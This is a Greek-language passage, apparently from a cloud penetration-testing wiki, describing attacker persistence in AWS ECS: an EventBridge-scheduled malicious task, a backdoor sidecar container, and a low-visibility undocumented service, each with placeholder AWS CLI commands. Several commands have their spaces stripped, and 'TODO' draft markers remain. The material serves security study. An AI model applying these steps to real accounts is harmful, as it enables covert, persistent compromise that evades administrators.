Ένας επιτιθέμενος μπορεί να δημιουργήσει μια κρυφή περιοδική εργασία ECS χρησιμοποιώντας το Amazon EventBridge για να προγραμματίσει την εκτέλεση μιας κακόβουλης εργασίας περιοδικά. Αυτή η εργασία μπορεί να πραγματοποιήσει αναγνώριση, εξαγωγή δεδομένων ή διατήρηση της μόνιμης παρουσίας στον λογαριασμό AWS.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an Amazon EventBridge rule to trigger the task periodicallyawseventsput-rule--name"malicious-ecs-task-rule"--schedule-expression"rate(1 day)"# Add a target to the rule to run the malicious ECS taskawseventsput-targets--rule"malicious-ecs-task-rule"--targets'[{"Id": "malicious-ecs-task-target","Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster","RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role","EcsParameters": {"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task","TaskCount": 1}}]'
Πίσω πόρτα Container σε Υπάρχουσα Ορισμού Εργασίας ECS
TODO: Ελέγξτε
Ένας επιτιθέμενος μπορεί να προσθέσει ένα αόρατο πίσω πόρτα container σε έναν υπάρχοντα ορισμό εργασίας ECS που εκτελείται παράλληλα με νόμιμα containers. Το πίσω πόρτα container μπορεί να χρησιμοποιηθεί για την διατήρηση και εκτέλεση κακόβουλων δραστηριοτήτων.
# Update the existing task definition to include the backdoor containerawsecsregister-task-definition--family"existing-task"--container-definitions'[{"name": "legitimate-container","image": "legitimate-image:latest","memory": 256,"cpu": 10,"essential": true},{"name": "backdoor-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": false}]'
Μη τεκμηριωμένη υπηρεσία ECS
TODO: Ελέγξτε
Ένας επιτιθέμενος μπορεί να δημιουργήσει μια μη τεκμηριωμένη υπηρεσία ECS που εκτελεί μια κακόβουλη εργασία. Ρυθμίζοντας τον επιθυμητό αριθμό των εργασιών σε ένα ελάχιστο και απενεργοποιώντας την καταγραφή, γίνεται πιο δύσκολο για τους διαχειριστές να παρατηρήσουν την κακόβουλη υπηρεσία.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an undocumented ECS service with the malicious task definitionaws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
